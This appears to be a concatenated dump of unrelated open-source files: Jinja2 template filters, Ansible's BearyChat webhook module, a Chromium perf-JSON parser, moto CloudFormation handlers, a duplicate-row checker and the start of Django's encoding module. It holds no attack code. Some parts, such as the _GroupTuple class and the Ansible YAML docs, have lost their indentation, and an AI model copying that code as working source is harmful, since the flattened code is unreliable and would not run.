@environmentfilter
def do_first(environment, seq):
    """Return the first item of a sequence."""
    try:
        return next(iter(seq))
    except StopIteration:
        # Empty sequence: yield an Undefined instead of raising.
        return environment.undefined('No first item, sequence was empty.')
@environmentfilter
def do_last(environment, seq):
    """Return the last item of a sequence."""
    try:
        # reversed() requires a sequence, not a bare iterator.
        return next(iter(reversed(seq)))
    except StopIteration:
        return environment.undefined('No last item, sequence was empty.')
@environmentfilter
def do_random(environment, seq):
    """Return a random item from the sequence."""
    try:
        return choice(seq)
    except IndexError:
        # random.choice raises IndexError on an empty sequence.
        return environment.undefined('No random item, sequence was empty.')
def do_filesizeformat(value, binary=False):
    """Format the value like a 'human-readable' file size (i.e. 13 kB,
    4.1 MB, 102 Bytes, etc).  Per default decimal prefixes are used (Mega,
    Giga, etc.), if the second parameter is set to `True` the binary
    prefixes are used (Mebi, Gibi).
    """
    size = float(value)
    base = 1024 if binary else 1000
    if binary:
        prefixes = ['KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB']
    else:
        prefixes = ['kB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB']
    if size == 1:
        return '1 Byte'
    if size < base:
        return '%d Bytes' % size
    # Find the first unit the size fits under; the last prefix is reused
    # for anything larger than the table covers.
    for exponent, prefix in enumerate(prefixes, start=2):
        unit = base ** exponent
        if size < unit:
            break
    return '%.1f %s' % (base * size / unit, prefix)
def do_pprint(value, verbose=False):
    """Pretty print a variable. Useful for debugging.

    With Jinja 1.2 onwards you can pass it a parameter.  If this parameter
    is truthy the output will be more verbose (this requires `pretty`)
    """
    return pformat(value, verbose=verbose)
@evalcontextfilter
def do_urlize(eval_ctx, value, trim_url_limit=None, nofollow=False,
              target=None):
    """Converts URLs in plain text into clickable links.

    If you pass the filter an additional integer it will shorten the urls
    to that number. Also a third argument exists that makes the urls
    "nofollow":

    .. sourcecode:: jinja

        {{ mytext|urlize(40, true) }}
            links are shortened to 40 chars and defined with rel="nofollow"

    If *target* is specified, the ``target`` attribute will be added to the
    ``<a>`` tag:

    .. sourcecode:: jinja

       {{ mytext|urlize(40, target='_blank') }}

    .. versionchanged:: 2.8+
       The *target* parameter was added.
    """
    rv = urlize(value, trim_url_limit, nofollow, target)
    # Under autoescaping the generated markup must be flagged as safe.
    if eval_ctx.autoescape:
        rv = Markup(rv)
    return rv
def do_indent(s, width=4, indentfirst=False):
    """Return a copy of the string with each line indented by *width*
    spaces (default ``4``).  The first line is only indented when
    *indentfirst* is true:

    .. sourcecode:: jinja

        {{ mytext|indent(2, true) }}
            indent by two spaces and indent the first line too.
    """
    pad = u' ' * width
    indented = (u'\n' + pad).join(s.splitlines())
    if indentfirst:
        indented = pad + indented
    return indented
def do_truncate(s, length=255, killwords=False, end='...'):
    """Return a truncated copy of the string.

    The cut-off point is ``length`` (default ``255``).  Strings whose
    length does not exceed ``length + len(end)`` are returned unchanged,
    so truncation only happens when it actually shortens the text.  If
    ``killwords`` is true the text is cut mid-word so the result
    (including the ellipsis) is exactly ``length`` characters; otherwise
    the last partial word is dropped.  A different ellipsis than
    ``"..."`` can be supplied via ``end``.

    .. sourcecode:: jinja

        {{ "foo bar baz qux"|truncate(9) }}
            -> "foo ..."

        {{ "foo bar baz qux"|truncate(9, True) }}
            -> "foo ba..."

    (Docstring fix only: the previous examples showed an 11 character
    string being truncated at length 9, but it is within the
    ``length + len(end)`` leeway and is in fact returned unmodified.)
    """
    if len(s) <= (length + len(end)):
        return s
    elif killwords:
        return s[:length - len(end)] + end
    words = s.split(' ')
    result = []
    m = 0
    for word in words:
        # +1 accounts for the separating space.
        m += len(word) + 1
        if m > (length - len(end)):
            break
        result.append(word)
    result.append(end)
    return u' '.join(result)
@environmentfilter
def do_wordwrap(environment, s, width=79, break_long_words=True,
                wrapstring=None):
    """
    Return a copy of the string passed to the filter wrapped after
    ``79`` characters.  You can override this default using the first
    parameter.  If you set the second parameter to `false` Jinja will not
    split words apart if they are longer than `width`. By default, the newlines
    will be the default newlines for the environment, but this can be changed
    using the wrapstring keyword argument.

    .. versionadded:: 2.7
       Added support for the `wrapstring` parameter.
    """
    if not wrapstring:
        wrapstring = environment.newline_sequence
    # Imported lazily so the module import stays cheap.
    import textwrap
    return wrapstring.join(textwrap.wrap(s, width=width, expand_tabs=False,
                                         replace_whitespace=False,
                                         break_long_words=break_long_words))
def do_wordcount(s):
    """Count the words in that string."""
    # _word_re matches runs of word characters (unicode-aware).
    return len(_word_re.findall(s))
def do_int(value, default=0):
    """Convert the value into an integer.  If the conversion does not
    work it will return ``0``.  You can override this default using the
    first parameter.
    """
    try:
        return int(value)
    except (TypeError, ValueError):
        pass
    # Retry via float so "42.23"|int gives 42 instead of the default.
    try:
        return int(float(value))
    except (TypeError, ValueError):
        return default
def do_float(value, default=0.0):
    """Convert the value into a floating point number.  If the conversion
    does not work it will return ``0.0``.  You can override this default
    using the first parameter.
    """
    try:
        result = float(value)
    except (TypeError, ValueError):
        result = default
    return result
def do_format(value, *args, **kwargs):
    """
    Apply python string formatting on an object:

    .. sourcecode:: jinja

        {{ "%s - %s"|format("Hello?", "Foo!") }}
            -> Hello? - Foo!
    """
    # %-formatting takes either a tuple or a mapping, never both.
    if args and kwargs:
        raise FilterArgumentError('can\'t handle positional and keyword '
                                  'arguments at the same time')
    return soft_unicode(value) % (kwargs or args)
def do_trim(value):
    """Strip leading and trailing whitespace."""
    return soft_unicode(value).strip()
def do_striptags(value):
    """Strip SGML/XML tags and replace adjacent whitespace by one space.
    """
    # Unwrap Markup-like objects so their raw markup gets stripped too.
    if hasattr(value, '__html__'):
        value = value.__html__()
    return Markup(text_type(value)).striptags()
def do_slice(value, slices, fill_with=None):
    """Slice an iterator and return a list of lists containing
    those items.  Useful if you want to create a div containing
    three ul tags that represent columns:

    .. sourcecode:: html+jinja

        <div class="columwrapper">
          {%- for column in items|slice(3) %}
            <ul class="column-{{ loop.index }}">
            {%- for item in column %}
              <li>{{ item }}</li>
            {%- endfor %}
            </ul>
          {%- endfor %}
        </div>

    If you pass it a second argument it's used to fill missing
    values on the last iteration.
    """
    seq = list(value)
    total = len(seq)
    per_slice, with_extra = divmod(total, slices)
    offset = 0
    for number in range(slices):
        start = offset + number * per_slice
        # The first `with_extra` columns each absorb one leftover item.
        if number < with_extra:
            offset += 1
        end = offset + (number + 1) * per_slice
        column = seq[start:end]
        if fill_with is not None and number >= with_extra:
            column.append(fill_with)
        yield column
def do_batch(value, linecount, fill_with=None):
    """
    A filter that batches items.  It works pretty much like `slice`
    just the other way round.  It returns a list of lists with the
    given number of items.  If you provide a second parameter this
    is used to fill up missing items.  See this example:

    .. sourcecode:: html+jinja

        <table>
        {%- for row in items|batch(3, '&nbsp;') %}
          <tr>
          {%- for column in row %}
            <td>{{ column }}</td>
          {%- endfor %}
          </tr>
        {%- endfor %}
        </table>
    """
    current = []
    for item in value:
        if len(current) == linecount:
            yield current
            current = []
        current.append(item)
    # Flush the trailing partial batch, padded if a filler was given.
    if current:
        shortfall = linecount - len(current)
        if fill_with is not None and shortfall:
            current.extend([fill_with] * shortfall)
        yield current
def do_round(value, precision=0, method='common'):
    """Round the number to a given precision. The first
    parameter specifies the precision (default is ``0``), the
    second the rounding method:

    - ``'common'`` rounds either up or down
    - ``'ceil'`` always rounds up
    - ``'floor'`` always rounds down

    If you don't specify a method ``'common'`` is used.

    .. sourcecode:: jinja

        {{ 42.55|round }}
            -> 43.0
        {{ 42.55|round(1, 'floor') }}
            -> 42.5

    Note that even if rounded to 0 precision, a float is returned.  If
    you need a real integer, pipe it through `int`:

    .. sourcecode:: jinja

        {{ 42.55|round|int }}
            -> 43

    :raises FilterArgumentError: if *method* is not one of the three
        supported names.
    """
    # `x not in y` is the idiomatic spelling of `not x in y`.
    if method not in ('common', 'ceil', 'floor'):
        raise FilterArgumentError('method must be common, ceil or floor')
    if method == 'common':
        return round(value, precision)
    func = getattr(math, method)
    # Apply ceil/floor in the scaled domain so `precision` still works.
    return func(value * (10 ** precision)) / (10 ** precision)
@environmentfilter
def do_groupby(environment, value, attribute):
    """Group a sequence of objects by a common attribute.

    If you for example have a list of dicts or objects that represent persons
    with `gender`, `first_name` and `last_name` attributes and you want to
    group all users by genders you can do something like the following
    snippet:

    .. sourcecode:: html+jinja

        <ul>
        {% for group in persons|groupby('gender') %}
            <li>{{ group.grouper }}<ul>
            {% for person in group.list %}
                <li>{{ person.first_name }} {{ person.last_name }}</li>
            {% endfor %}</ul></li>
        {% endfor %}
        </ul>

    Additionally it's possible to use tuple unpacking for the grouper and
    list:

    .. sourcecode:: html+jinja

        <ul>
        {% for grouper, list in persons|groupby('gender') %}
            ...
        {% endfor %}
        </ul>

    As you can see the item we're grouping by is stored in the `grouper`
    attribute and the `list` contains all the objects that have this grouper
    in common.

    .. versionchanged:: 2.6
       It's now possible to use dotted notation to group by the child
       attribute of another attribute.
    """
    expr = make_attrgetter(environment, attribute)
    # itertools.groupby only groups adjacent items, so sort by the same
    # key first; the outer sorted() orders the resulting groups.
    return sorted(map(_GroupTuple, groupby(sorted(value, key=expr), expr)))
class _GroupTuple(tuple):
__slots__ = ()
grouper = property(itemgetter(0))
list = property(itemgetter(1))
def __new__(cls, xxx_todo_changeme):
(key, value) = xxx_todo_changeme
return tuple.__new__(cls, (key, list(value)))
@environmentfilter
def do_sum(environment, iterable, attribute=None, start=0):
    """Returns the sum of a sequence of numbers plus the value of parameter
    'start' (which defaults to 0).  When the sequence is empty it returns
    start.

    It is also possible to sum up only certain attributes:

    .. sourcecode:: jinja

        Total: {{ items|sum(attribute='price') }}

    .. versionchanged:: 2.6
       The `attribute` parameter was added to allow suming up over
       attributes.  Also the `start` parameter was moved on to the right.
    """
    if attribute is not None:
        iterable = imap(make_attrgetter(environment, attribute), iterable)
    return sum(iterable, start)
def do_list(value):
    """Convert the value into a list.  If it was a string the returned list
    will be a list of characters.
    """
    return list(value)
def do_mark_safe(value):
    """Mark the value as safe which means that in an environment with automatic
    escaping enabled this variable will not be escaped.
    """
    return Markup(value)
def do_mark_unsafe(value):
    """Mark a value as unsafe.  This is the reverse operation for :func:`safe`."""
    # Coercing to plain text drops the Markup "safe" flag.
    return text_type(value)
def do_reverse(value):
    """Reverse the object or return an iterator the iterates over it the other
    way round.
    """
    if isinstance(value, string_types):
        return value[::-1]
    try:
        return reversed(value)
    except TypeError:
        # Not a sequence: materialize the iterable and reverse in place.
        try:
            rv = list(value)
            rv.reverse()
            return rv
        except TypeError:
            raise FilterArgumentError('argument must be iterable')
@environmentfilter
def do_attr(environment, obj, name):
    """Get an attribute of an object.  ``foo|attr("bar")`` works like
    ``foo["bar"]`` just that always an attribute is returned and items are not
    looked up.

    See :ref:`Notes on subscriptions <notes-on-subscriptions>` for more details.
    """
    try:
        name = str(name)
    except UnicodeError:
        pass
    else:
        try:
            value = getattr(obj, name)
        except AttributeError:
            pass
        else:
            # In a sandbox, unsafe attributes resolve to a special
            # Undefined instead of the real value.
            if environment.sandboxed and not \
               environment.is_safe_attribute(obj, name, value):
                return environment.unsafe_undefined(obj, name)
            return value
    return environment.undefined(obj=obj, name=name)
@contextfilter
def do_map(*args, **kwargs):
    """Applies a filter on a sequence of objects or looks up an attribute.
    This is useful when dealing with lists of objects but you are really
    only interested in a certain value of it.

    The basic usage is mapping on an attribute.  Imagine you have a list
    of users but you are only interested in a list of usernames:

    .. sourcecode:: jinja

        Users on this page: {{ users|map(attribute='username')|join(', ') }}

    Alternatively you can let it invoke a filter by passing the name of the
    filter and the arguments afterwards.  A good example would be applying a
    text conversion filter on a sequence:

    .. sourcecode:: jinja

        Users on this page: {{ titles|map('lower')|join(', ') }}

    .. versionadded:: 2.7
    """
    # args[0] is the template context, args[1] the sequence to map over.
    context = args[0]
    seq = args[1]
    if len(args) == 2 and 'attribute' in kwargs:
        attribute = kwargs.pop('attribute')
        if kwargs:
            raise FilterArgumentError('Unexpected keyword argument %r' %
                                      next(iter(kwargs)))
        func = make_attrgetter(context.environment, attribute)
    else:
        # Filter-name form: remaining positional/keyword args are
        # forwarded to the named filter for each item.
        try:
            name = args[2]
            args = args[3:]
        except LookupError:
            raise FilterArgumentError('map requires a filter argument')
        func = lambda item: context.environment.call_filter(
            name, item, args, kwargs, context=context)
    if seq:
        for item in seq:
            yield func(item)
@contextfilter
def do_select(*args, **kwargs):
    """Filters a sequence of objects by applying a test to the object and only
    selecting the ones with the test succeeding.

    Example usage:

    .. sourcecode:: jinja

        {{ numbers|select("odd") }}

    .. versionadded:: 2.7
    """
    return _select_or_reject(args, kwargs, lambda x: x, False)
@contextfilter
def do_reject(*args, **kwargs):
    """Filters a sequence of objects by applying a test to the object and
    rejecting the ones with the test succeeding.

    Example usage:

    .. sourcecode:: jinja

        {{ numbers|reject("odd") }}

    .. versionadded:: 2.7
    """
    return _select_or_reject(args, kwargs, lambda x: not x, False)
@contextfilter
def do_selectattr(*args, **kwargs):
    """Filters a sequence of objects by applying a test to an attribute of an
    object and only selecting the ones with the test succeeding.

    Example usage:

    .. sourcecode:: jinja

        {{ users|selectattr("is_active") }}
        {{ users|selectattr("email", "none") }}

    .. versionadded:: 2.7
    """
    return _select_or_reject(args, kwargs, lambda x: x, True)
@contextfilter
def do_rejectattr(*args, **kwargs):
    """Filters a sequence of objects by applying a test to an attribute of an
    object or the attribute and rejecting the ones with the test succeeding.

    .. sourcecode:: jinja

        {{ users|rejectattr("is_active") }}
        {{ users|rejectattr("email", "none") }}

    .. versionadded:: 2.7
    """
    return _select_or_reject(args, kwargs, lambda x: not x, True)
def _select_or_reject(args, kwargs, modfunc, lookup_attr):
    """Shared implementation of select/reject/selectattr/rejectattr.

    *modfunc* inverts (reject) or passes through (select) the test
    result; *lookup_attr* enables the attribute-lookup variants.
    """
    # args[0] is the template context, args[1] the sequence to filter.
    context = args[0]
    seq = args[1]
    if lookup_attr:
        try:
            attr = args[2]
        except LookupError:
            raise FilterArgumentError('Missing parameter for attribute name')
        transfunc = make_attrgetter(context.environment, attr)
        off = 1
    else:
        off = 0
        transfunc = lambda x: x
    try:
        # Optional test name plus its extra arguments.
        name = args[2 + off]
        args = args[3 + off:]
        func = lambda item: context.environment.call_test(
            name, item, args, kwargs)
    except LookupError:
        # No test given: plain truthiness check.
        func = bool
    if seq:
        for item in seq:
            if modfunc(func(transfunc(item))):
                yield item
#: Mapping of filter names to their implementations, as exposed to
#: templates.  (The duplicate 'title' and 'capitalize' entries of the
#: original literal were removed; later duplicates silently overwrote
#: the earlier, identical ones.)
FILTERS = {
    'attr': do_attr,
    'replace': do_replace,
    'upper': do_upper,
    'lower': do_lower,
    'escape': escape,
    'e': escape,
    'forceescape': do_forceescape,
    'capitalize': do_capitalize,
    'title': do_title,
    'default': do_default,
    'd': do_default,
    'join': do_join,
    'count': len,
    'dictsort': do_dictsort,
    'sort': do_sort,
    'length': len,
    'reverse': do_reverse,
    'center': do_center,
    'indent': do_indent,
    'first': do_first,
    'last': do_last,
    'map': do_map,
    'random': do_random,
    'reject': do_reject,
    'rejectattr': do_rejectattr,
    'filesizeformat': do_filesizeformat,
    'pprint': do_pprint,
    'truncate': do_truncate,
    'wordwrap': do_wordwrap,
    'wordcount': do_wordcount,
    'int': do_int,
    'float': do_float,
    'string': soft_unicode,
    'list': do_list,
    'urlize': do_urlize,
    'format': do_format,
    'trim': do_trim,
    'striptags': do_striptags,
    'select': do_select,
    'selectattr': do_selectattr,
    'slice': do_slice,
    'batch': do_batch,
    'sum': do_sum,
    'abs': abs,
    'round': do_round,
    'groupby': do_groupby,
    'safe': do_mark_safe,
    'xmlattr': do_xmlattr,
    'urlencode': do_urlencode,
}
| gpl-3.0 |
amenonsen/ansible | lib/ansible/modules/notification/bearychat.py | 52 | 5908 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Jiangge Zhang <tonyseek@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = """
module: bearychat
short_description: Send BearyChat notifications
description:
- The M(bearychat) module sends notifications to U(https://bearychat.com)
via the Incoming Robot integration.
version_added: "2.4"
author: "Jiangge Zhang (@tonyseek)"
options:
url:
description:
- BearyChat WebHook URL. This authenticates you to the bearychat
service. It looks like
C(https://hook.bearychat.com/=ae2CF/incoming/e61bd5c57b164e04b11ac02e66f47f60).
required: true
text:
description:
- Message to send.
markdown:
description:
- If C(yes), text will be parsed as markdown.
default: 'yes'
type: bool
channel:
description:
- Channel to send the message to. If absent, the message goes to the
default channel selected by the I(url).
attachments:
description:
- Define a list of attachments. For more information, see
https://github.com/bearyinnovative/bearychat-tutorial/blob/master/robots/incoming.md#attachments
"""
EXAMPLES = """
- name: Send notification message via BearyChat
local_action:
module: bearychat
url: |
https://hook.bearychat.com/=ae2CF/incoming/e61bd5c57b164e04b11ac02e66f47f60
text: "{{ inventory_hostname }} completed"
- name: Send notification message via BearyChat all options
local_action:
module: bearychat
url: |
https://hook.bearychat.com/=ae2CF/incoming/e61bd5c57b164e04b11ac02e66f47f60
text: "{{ inventory_hostname }} completed"
markdown: no
channel: "#ansible"
attachments:
- title: "Ansible on {{ inventory_hostname }}"
text: "May the Force be with you."
color: "#ffffff"
images:
- http://example.com/index.png
"""
RETURN = """
msg:
description: execution result
returned: success
type: str
sample: "OK"
"""
# urlparse/urlunparse come from six.moves; guard the import so the module
# can still load and fail gracefully in main() when it is unavailable.
# Catch ImportError specifically rather than every Exception so genuine
# errors inside the import machinery are not silently swallowed.
try:
    from ansible.module_utils.six.moves.urllib.parse import urlparse, urlunparse
    HAS_URLPARSE = True
except ImportError:
    HAS_URLPARSE = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.urls import fetch_url
def build_payload_for_bearychat(module, text, markdown, channel, attachments):
    """Assemble the ``payload=<json>`` form body for the incoming webhook.

    Parameters that are ``None`` are omitted from the JSON document.
    Each attachment dict is normalized through
    build_payload_for_bearychat_attachment().
    """
    payload = {}
    if text is not None:
        payload['text'] = text
    if markdown is not None:
        payload['markdown'] = markdown
    if channel is not None:
        payload['channel'] = channel
    if attachments is not None:
        payload.setdefault('attachments', []).extend(
            build_payload_for_bearychat_attachment(
                module, item.get('title'), item.get('text'), item.get('color'),
                item.get('images'))
            for item in attachments)
    # BearyChat expects a form-encoded "payload" field holding the JSON.
    payload = 'payload=%s' % module.jsonify(payload)
    return payload
def build_payload_for_bearychat_attachment(module, title, text, color, images):
    """Build a single attachment dict for the BearyChat payload.

    Only arguments that are not ``None`` end up in the result.  Images may
    be given as URL strings, or as dicts carrying a ``url`` key; anything
    else aborts the module run via ``module.fail_json``.
    """
    attachment = {}
    for key, value in (('title', title), ('text', text), ('color', color)):
        if value is not None:
            attachment[key] = value
    if images is not None:
        collected = attachment.setdefault('images', [])
        if not isinstance(images, (list, tuple)):
            images = [images]
        for image in images:
            if isinstance(image, dict) and 'url' in image:
                image = {'url': image['url']}
            elif hasattr(image, 'startswith') and image.startswith('http'):
                image = {'url': image}
            else:
                module.fail_json(
                    msg="BearyChat doesn't have support for this kind of "
                        "attachment image")
            collected.append(image)
    return attachment
def do_notify_bearychat(module, url, payload):
    """POST *payload* to the webhook *url*; fail the module on non-200."""
    response, info = fetch_url(module, url, data=payload)
    if info['status'] != 200:
        url_info = urlparse(url)
        # Strip the path so the secret webhook token never appears in the
        # error message.
        obscured_incoming_webhook = urlunparse(
            (url_info.scheme, url_info.netloc, '[obscured]', '', '', ''))
        module.fail_json(
            msg=" failed to send %s to %s: %s" % (
                payload, obscured_incoming_webhook, info['msg']))
def main():
    """Module entry point: parse arguments, build and send the payload."""
    module = AnsibleModule(argument_spec={
        # no_log keeps the secret webhook URL out of the logs.
        'url': dict(type='str', required=True, no_log=True),
        'text': dict(type='str'),
        'markdown': dict(default='yes', type='bool'),
        'channel': dict(type='str'),
        'attachments': dict(type='list'),
    })
    if not HAS_URLPARSE:
        module.fail_json(msg='urlparse is not installed')
    url = module.params['url']
    text = module.params['text']
    markdown = module.params['markdown']
    channel = module.params['channel']
    attachments = module.params['attachments']
    payload = build_payload_for_bearychat(
        module, text, markdown, channel, attachments)
    do_notify_bearychat(module, url, payload)
    module.exit_json(msg="OK")
if __name__ == '__main__':
    main()
| gpl-3.0 |
AOKP/external_chromium_org | build/android/pylib/json_perf_parser.py | 47 | 4366 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A helper module for parsing JSON objects from perf tests results."""
import json
def GetAverageRunInfo(json_data, name):
  """Summarizes TraceEvent JSON data for performance metrics.

  Supports two entry styles (more tags may be present, these are required):
  duration measurements as 'S' (start) / 'F' (finish) pairs, and call
  frequency measurements as repeated 'I' (instant) entries.  Only entries
  with ``cat == 'Java'`` and a matching ``name`` are considered.

  Args:
    json_data: A list of dictionaries each representing a JSON object.
    name: The 'name' tag to filter on in the JSON file.

  Returns:
    A dictionary of result data with the following tags:
      min: The minimum value tracked.
      max: The maximum value tracked.
      average: The average of all the values tracked.
      count: The number of times the category/name pair was tracked.
      type: The type of tracking ('Instant' for instant tags and 'Span'
          for begin/end tags.
      category: The passed in category filter.
      name: The passed in name filter.
      data_points: A list of all of the times used to generate this data.
      units: The units for the values being reported.

  Raises:
    Exception: if an entry contains neither 'mem' nor 'ts', or is missing
        the value field established by the first entry.
  """
  def EntryFilter(entry):
    return entry['cat'] == 'Java' and entry['name'] == name
  # Materialize the filter result explicitly (filter() is lazy on
  # Python 3; a list is unambiguous and re-iterable).
  filtered_entries = [e for e in json_data if EntryFilter(e)]
  result = {}
  result['min'] = -1
  result['max'] = -1
  result['average'] = 0
  result['count'] = 0
  result['type'] = 'Unknown'
  result['category'] = 'Java'
  result['name'] = name
  result['data_points'] = []
  result['units'] = ''
  total_sum = 0
  last_val = 0
  val_type = None
  GetVal = None
  for entry in filtered_entries:
    if val_type is None:
      # The first entry decides which value field is tracked; 'mem'
      # (kilobytes) takes precedence over 'ts' (microseconds -> ms).
      if 'mem' in entry:
        val_type = 'mem'
        GetVal = lambda entry: entry['mem']
        result['units'] = 'kb'
      elif 'ts' in entry:
        val_type = 'ts'
        GetVal = lambda entry: float(entry['ts']) / 1000.0
        result['units'] = 'ms'
      else:
        raise Exception('Entry did not contain valid value info: %s' % entry)
    # Idiomatic `not in` (was `not val_type in entry`).
    if val_type not in entry:
      raise Exception('Entry did not contain expected value type "%s" '
                      'information: %s' % (val_type, entry))
    val = GetVal(entry)
    if (entry['ph'] == 'S' and
        (result['type'] == 'Unknown' or result['type'] == 'Span')):
      result['type'] = 'Span'
      last_val = val
    elif ((entry['ph'] == 'F' and result['type'] == 'Span') or
          (entry['ph'] == 'I' and (result['type'] == 'Unknown' or
                                   result['type'] == 'Instant'))):
      # Record the delta since the previous reference value; the very
      # first instant entry only seeds last_val.
      if last_val > 0:
        delta = val - last_val
        if result['min'] == -1 or result['min'] > delta:
          result['min'] = delta
        if result['max'] == -1 or result['max'] < delta:
          result['max'] = delta
        total_sum += delta
        result['count'] += 1
        result['data_points'].append(delta)
      if entry['ph'] == 'I':
        result['type'] = 'Instant'
      last_val = val
  if result['count'] > 0:
    result['average'] = total_sum / result['count']
  return result
def GetAverageRunInfoFromJSONString(json_string, name):
  """Returns the results from GetAverageRunInfo using a JSON string.

  Args:
    json_string: The string containing JSON.
    name: The 'name' tag to filter on in the JSON file.

  Returns:
    See GetAverageRunInfo Returns section.
  """
  return GetAverageRunInfo(json.loads(json_string), name)
def GetAverageRunInfoFromFile(json_file, name):
  """Returns the results from GetAverageRunInfo using a JSON file.

  Args:
    json_file: The path to a JSON file.
    name: The 'name' tag to filter on in the JSON file.

  Returns:
    See GetAverageRunInfo Returns section.
  """
  with open(json_file, 'r') as f:
    perf = json.load(f)
  return GetAverageRunInfo(perf, name)
| bsd-3-clause |
DataDog/moto | moto/cloudformation/responses.py | 1 | 4294 | from __future__ import unicode_literals
import json
from jinja2 import Template
from moto.core.responses import BaseResponse
from .models import cloudformation_backend
class CloudFormationResponse(BaseResponse):
    """Translates CloudFormation API requests into calls on the in-memory
    cloudformation backend and renders the corresponding responses."""

    def create_stack(self):
        # Create the stack in the backend, then echo its generated id back.
        stack = cloudformation_backend.create_stack(
            name=self._get_param('StackName'),
            template=self._get_param('TemplateBody'),
        )
        response = {
            'CreateStackResponse': {
                'CreateStackResult': {
                    'StackId': stack.stack_id,
                }
            }
        }
        return json.dumps(response)

    def describe_stacks(self):
        # StackName is optional; without it the backend describes all stacks.
        stack_name_or_id = None
        if self._get_param('StackName'):
            stack_name_or_id = self.querystring.get('StackName')[0]
        matching = cloudformation_backend.describe_stacks(stack_name_or_id)
        return Template(DESCRIBE_STACKS_TEMPLATE).render(stacks=matching)

    def describe_stack_resources(self):
        target = cloudformation_backend.get_stack(self._get_param('StackName'))
        return Template(LIST_STACKS_RESOURCES_RESPONSE).render(stack=target)

    def list_stacks(self):
        all_stacks = cloudformation_backend.list_stacks()
        return Template(LIST_STACKS_RESPONSE).render(stacks=all_stacks)

    def get_template(self):
        name_or_stack_id = self.querystring.get('StackName')[0]
        return cloudformation_backend.get_stack(name_or_stack_id).template

    # TODO: update_stack is not implemented in the backend yet.

    def delete_stack(self):
        name_or_stack_id = self.querystring.get('StackName')[0]
        cloudformation_backend.delete_stack(name_or_stack_id)
        return json.dumps({
            'DeleteStackResponse': {
                'DeleteStackResult': {},
            }
        })
DESCRIBE_STACKS_TEMPLATE = """<DescribeStacksResult>
<Stacks>
{% for stack in stacks %}
<member>
<StackName>{{ stack.name }}</StackName>
<StackId>{{ stack.stack_id }}</StackId>
<CreationTime>2010-07-27T22:28:28Z</CreationTime>
<StackStatus>{{ stack.status }}</StackStatus>
<DisableRollback>false</DisableRollback>
<Outputs>
{% for output in stack.stack_outputs %}
<member>
<OutputKey>{{ output.key }}</OutputKey>
<OutputValue>{{ output.value }}</OutputValue>
</member>
{% endfor %}
</Outputs>
</member>
{% endfor %}
</Stacks>
</DescribeStacksResult>"""
LIST_STACKS_RESPONSE = """<ListStacksResponse>
<ListStacksResult>
<StackSummaries>
{% for stack in stacks %}
<member>
<StackId>{{ stack.id }}</StackId>
<StackStatus>{{ stack.status }}</StackStatus>
<StackName>{{ stack.name }}</StackName>
<CreationTime>2011-05-23T15:47:44Z</CreationTime>
<TemplateDescription>{{ stack.description }}</TemplateDescription>
</member>
{% endfor %}
</StackSummaries>
</ListStacksResult>
</ListStacksResponse>"""
LIST_STACKS_RESOURCES_RESPONSE = """<DescribeStackResourcesResult>
<StackResources>
{% for resource in stack.stack_resources %}
<member>
<StackId>{{ stack.stack_id }}</StackId>
<StackName>{{ stack.name }}</StackName>
<LogicalResourceId>{{ resource.logical_resource_id }}</LogicalResourceId>
<PhysicalResourceId>{{ resource.physical_resource_id }}</PhysicalResourceId>
<ResourceType>{{ resource.type }}</ResourceType>
<Timestamp>2010-07-27T22:27:28Z</Timestamp>
<ResourceStatus>{{ stack.status }}</ResourceStatus>
</member>
{% endfor %}
</StackResources>
</DescribeStackResourcesResult>"""
| apache-2.0 |
linsalrob/EdwardsLab | crAssphage/check_duplicates.py | 1 | 1365 | """
Parse the NCBI file and check for duplicates. We ignore sample name, title, bioproject accession and description
"""
import os
import sys
import argparse
from roblib import bcolors
__author__ = 'Rob Edwards'
def parse_file(fi, verbose):
    """
    Parse a tab-separated file and report duplicate rows on stderr.

    The first line is treated as a header; the columns sample_name, title,
    bioproject_accession and description are excluded from the duplicate
    comparison (they are shown highlighted in the reported rows).

    Bug fix: the original code populated ``ignore`` lazily with
    ``if not ignore:`` — when the header contained none of the ignorable
    columns, *every* row was treated as a header and skipped, so duplicates
    were never detected. The header is now identified explicitly as line 0.

    :param fi: path of the file to parse
    :param verbose: more output (currently unused)
    :return: dict mapping each row's comparison key to its colorized form
    """
    ignore = set()
    seen = {}
    with open(fi, 'r') as f:
        for lineno, l in enumerate(f):
            p = l.strip().split("\t")
            if lineno == 0:
                # Header line: record the indices of columns to ignore.
                for c in ['sample_name', 'title', 'bioproject_accession', 'description']:
                    if c in p:
                        ignore.add(p.index(c))
                continue
            s = ""  # comparison key: only the columns that matter
            t = ""  # display form: all columns, ignored ones highlighted
            for i in range(len(p)):
                if i in ignore:
                    t += f"{bcolors.BLUE}{p[i]}{bcolors.WHITE}" + " | "
                    continue
                t += p[i] + " | "
                s += p[i] + " | "
            if s in seen:
                sys.stderr.write(f"{bcolors.RED}DUPLICATE:{bcolors.ENDC}: {seen[s]}\n")
            seen[s] = t
    return seen
if __name__ == "__main__":
    # Command line entry point: -f <input file> [-v for verbose]
    parser = argparse.ArgumentParser(description=' ')
    parser.add_argument('-f', help='input file', required=True)
    parser.add_argument('-v', help='verbose output', action='store_true')
    args = parser.parse_args()
    parse_file(args.f, args.v)
| mit |
yongshengwang/hue | desktop/core/ext-py/Django-1.6.10/django/utils/encoding.py | 92 | 9512 | from __future__ import unicode_literals
import codecs
import datetime
from decimal import Decimal
import locale
import warnings
from django.utils.functional import Promise
from django.utils import six
from django.utils.six.moves.urllib.parse import quote
class DjangoUnicodeDecodeError(UnicodeDecodeError):
    """A UnicodeDecodeError that also remembers the offending object so the
